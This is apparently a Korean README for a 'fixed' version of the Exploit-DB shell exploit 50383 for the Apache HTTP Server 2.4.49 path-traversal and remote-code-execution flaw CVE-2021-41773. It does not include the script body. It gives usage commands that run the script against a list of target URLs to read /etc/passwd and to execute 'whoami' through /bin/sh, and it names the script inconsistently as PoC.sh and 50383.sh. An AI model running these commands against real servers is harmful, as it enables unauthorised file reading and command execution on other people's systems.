
고정된 Apache HTTP Server 2.4.49 CVE-2021-41773 경로 탐색 및 원격 코드 실행 취약점용 셸 익스플로잇. 취약한 대상에서 임의의 파일을 읽고 명령을 실행합니다.
이것은 CVE-2021-41773으로 식별되는 Apache HTTP Server 2.4.49 취약점에 대한 익스플로잇입니다. Exploit-DB에 게시된 원래 버전의 익스플로잇에는 구문 및 실행 오류가 포함되어 있었습니다. 따라서 이 버전은 Linux 환경에서 올바르게 작동하도록 수정되었습니다.
if 구조의 잘못된 구문이 수정되었습니다.for 루프가 올바르게 실행되도록 수정되었습니다.chmod +x PoC.sh
./50383.sh targets.txt /etc/passwd
targets.txthttp://192.168.1.100
http://vulnerable-site.com
/etc/passwd를 읽기 위한 익스플로잇 실행:./50383.sh targets.txt /etc/passwd
./50383.sh targets.txt /bin/sh whoami